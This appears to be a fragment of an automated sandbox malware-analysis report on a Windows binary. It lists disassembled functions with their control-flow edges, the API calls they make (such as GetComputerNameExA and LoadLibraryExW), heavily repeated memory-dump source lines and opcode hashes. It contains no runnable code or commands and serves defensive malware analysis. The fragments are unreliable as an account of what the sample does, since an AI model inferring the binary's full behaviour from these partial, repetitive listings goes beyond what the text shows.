                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 237503144-0
                                                                                                                                                                                                                                    • Opcode ID: 4642d1aa0b8a58c5912d225180fce4f3bae946e7c987ecd41618bbfc469412a8
                                                                                                                                                                                                                                    • Instruction ID: 92034fbd0255a05f18460cd62b3d33c0bd07b1934ce199186143c238b4d14689
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4642d1aa0b8a58c5912d225180fce4f3bae946e7c987ecd41618bbfc469412a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 323130E9B005401BE515B6312CA3A7F3157ABD0718F081428F40B2B387ED75F91AB6E7
                                                                                                                                                                                                                                    Function 00C48A50 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                    • Instruction ID: 248107abdc0fdb49a102d0432bff710e21bc4b879d0875e1261106ad4c21c4e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21C537A627184BD3108E54DCC87957762E7D9328F3E86B8C9249F3D2C97BA91386C0
                                                                                                                                                                                                                                    Function 00C6D7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1123 c6d7ee-c6d7f3 1124 c6d7f5-c6d7f9 1123->1124 1125 c6d813-c6d819 1123->1125 1126 c6d800-c6d809 1124->1126 1127 c6d896-c6dbfb FreeLibrary call c7fe00 1125->1127 1126->1126 1128 c6d80b-c6d80e 1126->1128 1132 c6dc00-c6dc12 1127->1132 1128->1127 1132->1132 1133 c6dc14-c6dc19 1132->1133 1134 c6dc2d 1133->1134 1135 c6dc1b-c6dc1f 1133->1135 1136 c6dc30-c6dc72 GetComputerNameExA 1134->1136 1137 c6dc20-c6dc29 1135->1137 1137->1137 1138 c6dc2b 1137->1138 1138->1136
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00C6D898
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00C6DC43
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                    • String ID: ;87>
                                                                                                                                                                                                                                    • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                    • Opcode ID: 3752d9e9f37abf0c842651d4cedd365a45b8f0afe889a7349242200d1a976c38
                                                                                                                                                                                                                                    • Instruction ID: c5a9aa58bd6ba27b219b41f162f7f0497b0d45e3f422462caa6f27bac7877d2c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3752d9e9f37abf0c842651d4cedd365a45b8f0afe889a7349242200d1a976c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 102128716047428FEB318F29D890726BFE1AF9B300F188699C4D78B396D7349842C791
                                                                                                                                                                                                                                    Function 00C49D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1186 c49d1e-c49d34 1187 c49d40-c49d52 1186->1187 1187->1187 1188 c49d54-c49d7e 1187->1188 1189 c49d80-c49d92 1188->1189 1189->1189 1190 c49d94-c49e13 LoadLibraryExW call c7d960 1189->1190 1193 c49e20-c49e32 1190->1193 1193->1193 1194 c49e34-c49e5e 1193->1194 1195 c49e60-c49e72 1194->1195 1195->1195 1196 c49e74-c49e80 LoadLibraryExW call c7d960 1195->1196 1198 c49e85-c49e98 1196->1198
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000), ref: 00C49D98
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000), ref: 00C49E78
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                    • Opcode ID: e4d20a7238d63aa2a444cf45cba3e4b7bcb70d8ff81f8181914193c2e978e4b3
                                                                                                                                                                                                                                    • Instruction ID: fd76eb1f4f3c893cca9cc53c727d701f5840f39072f419458b42b817a088ee69
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4d20a7238d63aa2a444cf45cba3e4b7bcb70d8ff81f8181914193c2e978e4b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 284125B4D003009FE7149F7899D2A5A7F71FB06324F50429DE4A02F3A6C631580ACBE2
                                                                                                                                                                                                                                    Function 00C4EF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 00C4F09D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                                                                                    • Opcode ID: bad47292b7fba9d22a2fd9dc6be3fa95b20f9db0a950b6b628794607124104c6
                                                                                                                                                                                                                                    • Instruction ID: b9f95dc65a7e59ebde02cd367e90bfedbb7269f482d6dee31e17bbe31ad6d41b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bad47292b7fba9d22a2fd9dc6be3fa95b20f9db0a950b6b628794607124104c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41D8B4910B40AFD370EF3D9A4B7137EB8AB05250F504B1EF9E6866D4E231A4198BD7
                                                                                                                                                                                                                                    Function 00C6D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
